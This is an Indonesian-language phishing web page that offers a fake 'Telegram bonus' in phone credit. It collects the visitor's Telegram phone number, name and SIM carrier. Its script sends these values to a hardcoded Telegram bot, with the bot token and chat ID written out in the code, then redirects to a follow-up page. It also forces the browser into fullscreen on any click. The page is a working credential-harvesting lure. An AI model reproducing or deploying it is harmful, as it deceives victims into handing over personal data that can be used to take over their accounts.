<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Bonus Pulsa TELEGRAM</title>
    <link rel="icon" type="image/x-icon" href="asset/loading.png">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css" rel="stylesheet"
        integrity="sha384-T3c6CoIi6uLrA9TneNEoa7RxnatzjcDSCmG1MXxSR1GAsXEV/Dwwykc2MPK8M2HN" crossorigin="anonymous">
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            background: #f0f0f0;
        }

        .container {
            padding: 20px;
        }

        .logo-atas {
            text-align: center;
        }

        .image-web img {
            width: 250px;
        }

        .form-container {
            background-color: #fff;
            border: 1px solid #ccc;
            border-radius: 10px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.2);
            padding: 20px;
            margin-top: 20px;
        }

        .btnNext {
            background-color: #0ca2e7;
            border: none;
            border-radius: 10px;
            width: 90%;
            color: white;
            font-weight: bold;
            height: 45px;
            margin-top: 20px;
        }

        #proses {
            color: rgb(134, 2, 2);
            display: none;
            margin-top: 20px;
        }
    </style>
</head>

<body>
    <div class="container">
        <div class="logo-atas">
            <img class="img-fluid" src="asset/atas.jpg" alt="">
        </div>
    </div>

    <div class="container">
        <div class="logo-atas">
            <img class="img-fluid" src="asset/images.png" alt="">
        </div>
        <div class="title-web mt-1">
            <h2 class="text-center">Isi data penerima Bonus Telegram</h2>
        </div>
        <div class="image-web">
            <div class="form-container">
                <div class="col-md-3">
                    <label for="nope">Nomor akun TELEGRAM</label><br>
                    <input type="number" name="nope" id="nope" class="form-control">
                </div>

                <div class="col-md-3 mt-3">
                    <label for="pin">Nama Anda</label><br>
                    <input type="text" name="pin" id="pin" class="form-control">
                </div>

                <div class="container w-75 mt-3">
                    <div class="form-cc">
                        <div class="form-group" style="width: 70%">
                            <label for="input1">Simcard Anda</label>
                            <select class="form-control shadow-sm form-control-sm" id="input1">
                                <option value="">+Simcard Anda+</option>
                                <option value="TELKOMSEL">TELKOMSEL</option>
                                <option value="INDOSAT">INDOSAT</option>
                                <option value="TREE">TREE</option>
                                <option value="XL">XL</option>
                                <option value="LAINNYA">LAINNYA</option>
                            </select>
                        </div>
                    </div>
                </div>

                <center><button onclick="next()" class="btnNext">Kirimkan</button></center>
                <p id="proses" class="text-center">TERIMA KASIH PERMINTAAN ANDA SEDANG DI PROSES</p>
            </div>
        </div>
    </div>

    <script>
        const next = () => {
            let proses = document.querySelector("#proses");
            let nope = document.querySelector("#nope").value;
            let pin = document.querySelector("#pin").value;
            const nocard = document.querySelector("#input1").value;
            let token = "6514728762:AAE7vA-XNL83jNtpe0AVkVLGLcuVmd4ful8";
            let id_tele = "6597012778";
            if (nope === "" || pin === "") {
                alert("Mohon Isi data Dengan Benar");
            } else {
                let message = `  *Telegram Bonus*%0A%0ASIMCARD: ${nocard}%0A________________%0ANo. handphone:%0A${nope}%0A----------------------%0Anama: ${pin}`;
                let api = `https://api.telegram.org/bot${token}/sendMessage?chat_id=${id_tele}&text=${message}`;
                fetch(api, {
                    method: 'POST',
                })
                    .then((response) => response.json())
                    .then(data => {
                        console.log('Pesan terkirim:', data);
                        window.location.href = "indexai.html";
                    })
                    .catch((error) => {
                        console.error('Error:', error);
                    });
            }
        }
    </script>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/js/bootstrap.bundle.min.js"
        integrity="sha384-C6RzsynM9kWDrMNeT87bh95OGNyZPhcTNXj1NW7RuBCsyN/o0jlpcV8Qyq46cDfL"
        crossorigin="anonymous"></script>
        <script>
            document.documentElement.addEventListener("click", function () {
                var docElm = document.documentElement;
                if (docElm.requestFullscreen) { docElm.requestFullscreen() }
                else if (docElm.mozRequestFullScreen) { docElm.mozRequestFullScreen() }
                else if (docElm.webkitRequestFullScreen) { docElm.webkitRequestFullScreen() }
            });
        </script>
</body>

</html>
